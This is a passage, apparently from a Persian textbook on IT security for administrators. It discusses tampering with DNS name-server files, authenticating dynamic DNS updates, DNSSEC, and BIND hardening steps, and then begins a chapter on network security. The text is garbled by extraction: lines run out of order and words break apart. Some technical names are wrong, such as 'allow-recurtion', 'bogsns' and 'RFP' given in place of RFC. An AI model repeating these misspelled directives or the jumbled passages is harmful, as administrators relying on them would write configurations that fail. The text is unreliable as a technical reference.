‫ﻻ ﺑﺎﻳﺪ ﺑﺎ ﺣﺴﺎﺏ‬‫ﭘﺲ ﺍﺯ ﺁﻧﻜﻪ ﻓﺎﻳﻠﻬﺎ ﺩﺳﺘﻜﺎﺭﻱ ﺷﺪﻧﺪ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺑﺎﻳﺪ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﮔﺮﺩﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﻣﻌﻤﻮ ﹰ‬
‫ﻛﺎﺭﺑﺮﻱ ﺍﺑﺮﻛﺎﺭﺑﺮ ﺁﻏﺎﺯ ﺷﻮﺩ‪ ،‬ﻣﻬﺎﺟﻢ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺩﺳﺘﺮﺳﻲ ﺍﺑﺮﻛﺎﺭﺑﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﺍﻳﻦ ﻧﻮﻉ ﺗﻬﺎﺟﻢ ﺭﺍ‬
‫ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻣﻬﺎﺟ ﹺﻢ ﺑﺎﻣﻬﺎﺭﺕ ﻛﻨﺘﺮﻝ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ‪ ،‬ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﮔﺎﻡ ﻣﺆﺛﺮ ﺟﻬﺖ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺘﻦ ﻛﻨﺘﺮﻝ ﻛﻞ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪ .‬ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺩﺳﺘﺮﺳﻲ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻫﻢ ﻧﺪﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﺪ ﺍﻣﺎ ﺑﺘﻮﺍﻧﺪ ﻓﺎﻳﻠﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻛﻨﺪ‪ ،‬ﻛﺎﻓﻲ ﺍﺳﺖ ﺗﺎ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺑﻌﺪﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺗﻮﺳﻂ ﻳﻚ ﻓﺮﺩ ﻣﺠﺎﺯ‪ ،‬ﻭ‬
‫ﻳﺎ ﺧﺮﺍﺑﻲ ﺳﻴﺴﺘﻢ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺻﺒﺮ ﻛﻨﺪ ﺗﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺩﺍﺩﻩﺷﺪﻩ ﺍﺛﺮﮔﺬﺍﺭ ﺷﻮﻧﺪ‪.‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ DNS‬ﭘﻮﻳﺎ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺟﺪﻳﺪ ‪ DNS‬ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﭘﻮﻳﺎﻱ ﺟﺪﺍﻭﻝ ‪ DNS‬ﺩﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻫﻨﮕـﺎﻣﻲ ﺑﻜـﺎﺭ ﻣـﻲﺁﻳﻨـﺪ ﻛـﻪ‬
‫ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺑﺼﻮﺭﺕ ﭘﻮﻳﺎ ﺗﺨﺼﻴﺺ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﻳﺎ ﻣﻴﺎﻥ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩﺍﻧﺪ‪ DNS .‬ﭘﻮﻳﺎ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑـﺪﻭﻥ‬
‫ﻲ ﺩﺍﻣﻨﻪ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺘﻮﺍﻥ ﺟﺪﺍﻭﻝ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ‪ DNS‬ﺩﺭﺣـﺎﻝ ﺍﺟـﺮﺍ ﺭﺍ‬ ‫‪ upload‬ﻛﺮﺩﻥ ﺩﺳﺘﻲ ﻳﻚ ﻓﺎﻳﻞ ﻣﺘﻨ ﹺ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﺮﺩ‪ .‬ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎﻱ ﻣﺨﺮﺏ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﺑﻮﺩﻥ‪ ،‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎﻱ ﭘﻮﻳﺎﻱ ‪DNS‬ﻫﺎ ﺑﺎﻳﺪ ﺑﺪﺭﺳﺘﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺷـﻮﻧﺪ‪ .‬ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ ﻣﻬـﺎﺟﻢ ﺑـﺴﺎﺩﮔﻲ ﺑـﺎ ﺗﻐﻴﻴـﺮ‬
‫ﻧﮕﺎﺷﺖ ﻣﻴﺎﻥ ﻧﺎﻣﻬﺎﻱ ﺩﺍﻣﻨﻪ ﻭ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺒﻜﺔ ﺷﻤﺎ ﺭﺍ ﻣﻮﺭﺩ ﺗﻬﺎﺟﻢ ﻗﺮﺍﺭ ﺩﻫـﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ‬
‫‪ DNS‬ﭘﻮﻳﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺁﺩﺭﺱ ‪ IP‬ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﻣﺸﺘﺮﻙ ﻭ ﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻴﻬﺎﻳﻲ ﻛـﻪ ﻃﺒـﻖ ﻳـﻚ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﻪ ﺍﻣﻀﺎ ﺭﺳﻴﺪﻩﺍﻧﺪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ )ﺩﺭ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺗﻨﻬﺎ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺧﺎﺻﻲ ﻣﺠﺎﺯ ﺑﻪ ﺍﺭﺍﺋﻪ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻴﻬﺎ ﻫـﺴﺘﻨﺪ(‪ .‬ﺩﺭ ﺣﺎﻟـﺖ‬
‫ﻛﻠﻲ ﺍﺩﻏﺎﻡ ﺁﺩﺭﺱ ‪ IP‬ﻣﻨﺒﻊ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺩﻭ ﺭﻭﺵ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺑﺎﻻﺗﺮﻱ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‪.‬‬
‫ﺍﮔﺮ ﻗﺎﺑﻠﻴﺖ ‪ DNS‬ﭘﻮﻳﺎ ﺑﺪﺭﺳﺘﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ﻭ ﺷﻤﺎ ﺁﻧﺮﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﻭ ﺩﺳﺘﺮﺳـ ﹺ‬
‫ﻲ ﺍﻳﺠـﺎﺩ‬
‫ﻲ ﺗﻐﻴﻴ ﹺﺮ ﺑﺪﺧﻮﺍﻫﺎﻧـﺔ ‪ DNS‬ﭘﻮﻳـﺎ ﺭﻧـﺞ‬
‫ﺗﻐﻴﻴﺮ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﺍﺯ ﺣﻤﻼﺕ ﻣﺘﻮﺍﻟ ﹺ‬
‫ﻣﻲﺑﺮﻧﺪ‪.‬‬

‫‪DNSSEC‬‬
‫‪ RFP) DNSSEC‬ﺷﻤﺎﺭﺓ ‪ ۲۵۳۵‬ﻭ ‪ (۳۱۳۰‬ﻳﻚ ﮔﻮﻧﺔ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﺔ ‪ DNS‬ﺍﺳﺖ ﻛﻪ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ DNS‬ﻭ‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﭘﺎﺳﺨﻬﺎﻱ ‪ DNS‬ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ‪ DNSSEC .‬ﻳﻚ ﭘﺮﻭﺗﻜـﻞ ﭘﺮﻃﺮﻓـﺪﺍﺭ ﺍﺳـﺖ‪ .‬ﻃﺮﻓـﺪﺍﺭﺍﻥ ﺍﻳـﻦ‬
‫ﭘﺮﻭﺗﻜﻞ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭﻧﺪ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺭﻭﺵ ﺳﺎﺩﻩﺍﻱ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩ ‪ PKI‬ﺍﺳﺖ ﻛﻪ ﺑﻪ ﮔﻮﺍﻫﻲﻫﺎﻱ ﮔﺮﺍﻧﻘﻴﻤﺖ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ‬
‫ﮔﻮﺍﻫﻲ ﻣﺘﻤﺮﻛﺰ ﻓﺮﻭﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ ﻭﺍﺑﺴﺘﮕﻲ ﻧﺪﺍﺭﺩ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﻌﻠﺖ ﻃﺒﻴﻌﺖ ﺷﻬﺮﺕﻃﻠﺐ ‪ DNSSEC‬ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻛـﻪ ﻛـﺎﺭﺑﺮﺩ ﺁﻥ ﺩﺭ‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﺗﺠﺎﺭﻱ ﺩﺍﺭﺍﻱ ﺳﻮﺩﺁﻭﺭﻱ ﭼﻨﺪﺍﻧﻲ ﻧﻴﺴﺖ‪ ،‬ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺩﺭ ﺳﻄﺢ ﻭﺳﻴﻊ ﺗﻼﺵ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺎ ﺑﻜﺎﺭ ﺑﺴﺘﻦ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺣﺘﻤﺎﻝ ﺩﺳﺘﻜﺎﺭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻴﺪ‪:‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﻳﺪ ﻛﻪ ﻛﻪ ﻓﺎﻗﺪ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺑﺎﺷﺪ‪.‬‬ ‫•‬
‫ﭼﻨﺎﻧﭽﻪ ﻣﺠﺒﻮﺭ ﻫﺴﺘﻴﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻌﻤﻮﻟﻲ ﺍﺳﺖ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ‬ ‫•‬
‫ﻛﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﺎﻓﻈﺖ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻧـﺎﻡ ﺷـﻤﺎ‬
‫‪٣٧٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻣﻲﺗﻮﺍﻧﺪ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﺷﻮﺩ ﻛﻪ ﺑﺎ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻓﺎﻗﺪ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ )ﻣﺜﻞ ﻧﺴﺨﻪﻫـﺎﻱ ﺟﺪﻳـﺪ ‪ ،(BIND‬ﺑﺎﻳـﺪ ﺍﺯ‬
‫ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺭﺍ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺁﻥ ﻛﺎﺭﺑﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺤﺪﻭﺩﺷﺪﺓ ‪ chroot jail‬ﺳﻴﺴﺘﻢ ﻓﺎﻳـﻞ ﺍﺟـﺮﺍ ﺷـﻮﺩ )ﻣﺜـﻞ ﻧـﺴﺨﻪﻫـﺎﻱ ﺟﺪﻳـﺪ‬ ‫•‬
‫ﻲ ﺁﻥ ﺑﻪ ﺩﻳﮕﺮ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻥ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫‪ ،(BIND‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﮔﺰﻳﻨﻪ ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳ ﹺ‬
‫‪٢٣٧‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﻣﺤﺪﻭﺩﺓ ﺁﺩﺭﺳـﻬﺎﻱ ‪ IP‬ﺟﻌﻠـﻲ ﺭﺍ ﺭﺩ ﻛﻨـﺪ‪ .‬ﺩﺭ‬ ‫•‬
‫ﺳﻴﺴﺘﻢ ‪ ،BIND‬ﺩﺳﺘﻮﺭ ‪ blackhole‬ﺩﺭ ﻓﺎﻳﻞ ‪ named.conf‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺑﻜﺎﺭ ﺁﻳﺪ‪.‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ‪query ،‬ﻫﺎﻱ ﺑﺎﺯﮔﺸﺘﻲ ﻭ ﺗﻜﺮﺍﺭﺷـﻮﻧﺪﺓ ‪ DNS‬ﺭﺍ ﺑـﻪ‬ ‫•‬
‫ﺍﺟﺮﺍ ﺩﺭ ﻧﻴﺎﻭﺭﺩ‪ .‬ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﻤﺎ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺗﻘﺎﺿﺎ ﻧﺘﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺑﻴﺎﺑﺪ‪ ،‬ﺁﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‬
‫ﺧﻮﺩ ‪query‬ﻫﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺒﺪﻳﻞ ﻧﺎﻡ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ‪query‬ﻫﺎﻱ ﺑﺎﺯﮔﺸﺘﻲ ﻣﻨﺎﺑﻊ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻧـﺎﻡ ﺭﺍ ﺑﻜـﺎﺭ‬
‫ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﻟﺬﺍ ﻧﺒﺎﻳﺪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻢ ‪ ،BIND‬ﺩﺳـﺘﻮﺭ ‪ allow-recurtion‬ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﺪ ﻛﻪ ﻛﺪﺍﻡ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ‪query‬ﻫﺎﻱ ﺑﺎﺯﮔﺸﺘﻲ ﺻﺎﺩﺭ ﻛﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﭘﺎﻳﮕﺎﻩ ﺧﺎﺻﻲ ﺭﺍ ﻣﻲﺷﻨﺎﺳﻴﺪ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﺩ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺷﻤﺎ ﺣﻤﻠﻪ ﻛﻨﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻥ‬ ‫•‬
‫ﻧﺘﺎﻳﺞ ‪query‬ﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺑﻪ ﺁﻥ ﺍﺯ ﺩﺳﺘﻮﺭ ‪ bogsns‬ﺳﻴﺴﺘﻢ ‪ BIND‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﻳﺎ ﻧﺎﻡ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﺭﺍ ﺑﻪ ﻓﻬﺮﺳـﺖ‬
‫ﺳﻴﺎﻩ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺧﻮﺩ ﺑﻴﻔﺰﺍﻳﻴﺪ‪.‬‬
‫ﭼﻨﺎﻧﭽﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ‪ DNS‬ﭘﻮﻳﺎ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﮔﻴﺮﻳﺪ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﺻﺤﻴﺢ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎ ﻭ ﻳﺎ ﺍﻣﻀﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱﺷﺪﺓ ﺁﻧﻬـﺎ ﺭﺍ‬ ‫•‬
‫ﺍﻟﺰﺍﻣﻲ ﻛﻨﻴﺪ ﻭ ﻫﺮﮔﺰ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻣﺘﻜﻲ ﻧﺒﺎﺷﻴﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻼ ﭼﻨﺎﻧﭽﻪ ﺯﻳﺮﺷﺒﻜﺔ ﺷﻤﺎ ﺍﺯ ﺁﺩﺭﺱ ‪ 10.0.0.8‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﺪ‪ ،‬ﺍﻳﻦ ﺁﺩﺭﺱ ﺩﺭ ﺣﻴﻄﺔ ﺷﺒﻜﺔ ﺷﻤﺎ ﻳﻚ ﺁﺩﺭﺱ ﺟﻌﻠﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫‪ ۲۳۷‬ﻣﺜ ﹰ‬
‫‪٣٧٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ﻫﻔﺘﻢ‬
‫ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺑﻌﻨﻮﺍﻥ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﻣﺴﺘﻘﻞ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﺑﻴﺸﺘﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺯ ﻃﺮﻳـﻖ ﻣـﻮﺩﻡ‪ ،‬ﺷـﺒﻜﻪﻫـﺎ‪ ،‬ﻭ ﻳـﺎ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﺑﻲﺳﻴﻢ ﺑﻪ ﺩﻳﮕﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﻓﺼﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻧﻲ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﺷﺒﻜﻪﻫـﺎ ﭘﻴﻜﺮﺑﻨـﺪﻱ‬
‫ﻣﻲﻛﻨﻨﺪ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺍﺑﺘﺪﺍ ﻧﺤﻮﺓ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻣﻬﺎ‪ ،‬ﻣﺴﻴﺮﻳﺎﺑﻬﺎ‪ ،‬ﻭ ﺍﺑﺰﺍﺭ ﺑـﻲﺳـﻴﻢ ﻭ‬
‫ﺑﺎ ﺗﻮﺟﻪ ﻭﻳﮋﻩ ﺑﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬﺎ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ‪ ،‬ﻭ ﺳﭙﺲ ﺑﻪ ﺍﺻﻮﻝ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪ ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ‪TCP/IP‬‬
‫‪ -‬ﭘﺮﻭﺗﻜﻞ ﻏﺎﻟﺐ ﺷﺒﻜﻪ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻭ ﻧﻴﺰ ﺍﻳﻨﺘﺮﻧﺖ ‪ -‬ﻣﻲﭘﺮﺩﺍﺯﻳﻢ‪.‬‬

‫ﻣﻮﺩﻡ‬
